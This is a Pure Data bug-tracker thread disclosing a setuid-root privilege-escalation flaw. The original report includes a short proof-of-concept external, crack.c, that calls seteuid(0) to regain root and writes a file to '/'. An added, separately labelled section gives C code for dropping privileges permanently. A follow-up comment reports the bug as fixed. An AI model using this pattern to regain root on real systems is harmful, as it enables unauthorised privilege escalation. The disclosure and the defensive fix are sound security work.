Bugs item #1602345, was opened at 2006-11-24 10:48
Message generated for change (Comment added) made by eighthave
You can respond by visiting: 
https://sourceforge.net/tracker/?func=detail&atid=478070&aid=1602345&group_id=55736

Please note that this message will contain a full copy of the comment thread,
including the initial issue submission, for this request,
not just the latest update.
Category: puredata
Group: None
>Status: Pending
>Resolution: Fixed
Priority: 5
Private: No
Submitted By: Mathieu Bouchard (matju)
Assigned to: Miller Puckette (millerpuckette)
Summary: security vulnerability, giving root access

Initial Comment:
first configure with --enable-setuid or just chmod 4755 pd && chown root pd, 
which has the same effect.

then load this external called crack.c by making a [crack] box or -lib crack:

#include <unistd.h>
#include <stdio.h>
void crack_setup (void) {
  seteuid(0);
  fopen("/hax0r","w");
}

An empty file called "hax0r" appears in protected folder "/" even though 
privileges have been dropped by pd upon startup.


----------------------------------------------------------------------
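
Added example, not part of the original report and not Pd's own code: the initial comment shows seteuid(0) succeeding after privileges were dropped, which is what happens when only the effective uid was changed and the saved set-user-ID is still 0 (an assumption here, since the report does not show Pd's startup code). The C below drops setuid-root permanently and then verifies that root can no longer be reached; the function names are hypothetical.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Probe whether effective uid 0 is still reachable. Returns 1 if it is,
 * 0 if not, and puts the effective uid back the way it found it. */
int can_regain_root(void)
{
    uid_t euid = geteuid();
    if (euid == 0)
        return 1;                      /* already running as root */
    if (seteuid(0) != 0)
        return 0;                      /* saved set-user-ID is no longer 0 */
    if (seteuid(euid) != 0)
        _exit(1);                      /* could not undo the probe: stop */
    return 1;
}

/* Give up setuid-root for good: real, effective and saved IDs all become
 * the invoking user's. Returns 0 on success, -1 if root is still reachable. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    /* Assumption: startup did only a temporary drop, so the saved
     * set-user-ID is still 0. Take euid 0 back so that setuid() runs
     * privileged and rewrites all three IDs, not just the effective one. */
    int privileged = (geteuid() == 0) || (seteuid(0) == 0);
    if (privileged) {
        if (setgid(rgid) != 0)         /* group first, while still root */
            return -1;
        if (setuid(ruid) != 0)
            return -1;
    }
    /* Verify instead of trusting return codes: root must be unreachable. */
    if (getuid() != ruid || geteuid() != ruid)
        return -1;
    if (ruid != 0 && can_regain_root())
        return -1;
    return 0;
}

int main(void)
{
    printf("before: root reachable = %d\n", can_regain_root());
    if (drop_privileges_permanently() != 0)
        return 1;                      /* refuse to run with root reachable */
    printf("after:  root reachable = %d\n", can_regain_root());
    return 0;
}
```

The drop has to happen before any external or library is loaded, because code loaded into the process runs with whatever IDs the process still holds.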

>Comment By: Hans-Christoph Steiner (eighthave)
Date: 2007-11-05 20:01

Message:
Logged In: YES 
user_id=27104
Originator: NO


I am pretty sure this is the bug fixed by Miller's 0.40.3 and 0.39.3
releases.  Please adjust if I am wrong.

----------------------------------------------------------------------
